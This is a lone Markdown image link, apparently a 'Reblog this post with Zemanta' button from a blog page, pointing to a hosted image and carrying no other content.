![Reblog this post [with Zemanta]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sESava_cDkMgEF-4vjwvUj9zF_2tMqBOJ0-6nB-Uh-YXWllGm1wi1POTV5zFhm8lvSZYckabY7xtk2hSRR4J1308zgce-Cq2WKGPhxTMxrvXXJ20QkkCys2YUA-VF_TQP_K0ck9nadGbDhTnVH-U1-=s0-d)
